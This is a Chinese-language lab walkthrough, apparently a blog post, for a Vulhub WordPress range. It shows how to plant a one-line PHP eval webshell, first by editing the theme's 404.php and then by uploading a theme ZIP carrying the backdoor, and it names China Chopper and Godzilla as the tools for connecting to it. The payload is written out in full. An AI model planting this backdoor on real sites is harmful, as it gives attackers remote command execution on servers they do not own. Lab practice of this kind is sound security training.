vulhub靶场之WordPress

第一步搭建环境

靶场地址,自行去gethub找

安装靶场,使用vm虚拟机或云服务器 需安装docker和docker-compose

执行命令

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

开启docker

docker ps -a查看运行端口

访问进行wordpress设置

第二步 给404.php中写入一句话木马

搭建靶场后台

进行简单的网站后台设置后即可进入如下页面

思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】--》404.php

在404.php中写入一句话木马,删除其原本文件(可选),并更新文件

复制代码
<?php phpinfo();eval($_POST['cmd']);?>

访问以下路径可以访问到404.php文件

复制代码
/wp-content/themes/twentyfifteen/404.php
此为wordpress默认路径,若不知道也可百度搜索其所在位置

对木马使用你的武器库吧,这里小编选择了菜刀

是兄弟就来wordpress砍我!

第三步 这次我们换一个姿势,上传文件来上传木马

接着上一个环境使用...首先网上找一份免费的wordpress的zip主题文件

下载之后把一个木马文件添加到这个zip压缩包中

这里小编上传了一个666.php,内容如下

复制代码
<?php phpinfo();eval($_POST['cmd']);?>

将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】--》 【主题】--》「【添加】--》「【上传主題】--》「【浏览】--》【现在安装】

压缩文件中的文件名即为主题名

复制代码
访问
/wp-content/themes/【主题名】/【文件名】
/wp-content/themes/storeflex/666.php

对他使用你的哥斯拉吧

然而小编还是选择了菜刀,完

相关推荐
WHOAMI_老猫1 小时前
xss注入遇到转义,html编码绕过了解一哈
javascript·web安全·渗透测试·xss·漏洞原理
上海云盾-高防顾问8 小时前
云安全与网络安全:核心区别与协同作用解析
安全·web安全
枷锁—sha9 小时前
【DVWA系列】——xss(DOM)——High详细教程
前端·web安全·网络安全·xss
gaog2zh9 小时前
010502管道符_防火墙出入站_不回显带外-渗透命令-基础入门-网络安全
web安全·不回显带外·管道符·防火墙出入站
云盾安全防护1 天前
医疗行业网络安全的综合防护策略
网络·安全·web安全
安全系统学习1 天前
网络安全之RCE简单分析
开发语言·python·算法·安全·web安全
恰薯条的屑海鸥1 天前
零基础在实践中学习网络安全-皮卡丘靶场(第十一期-目录遍历模块)
学习·安全·web安全·渗透测试·网络安全学习
网安INF1 天前
CVE-2020-1938源码分析与漏洞复现(Tomcat 文件包含/读取)
java·网络·web安全·网络安全·tomcat·漏洞复现
无名小猴1 天前
bugku 网络安全事件应急响应
web安全
qq_243050791 天前
sipsak:SIP瑞士军刀!全参数详细教程!Kali Linux教程!
linux·web安全·网络安全·黑客·教程·kali linux·voip工具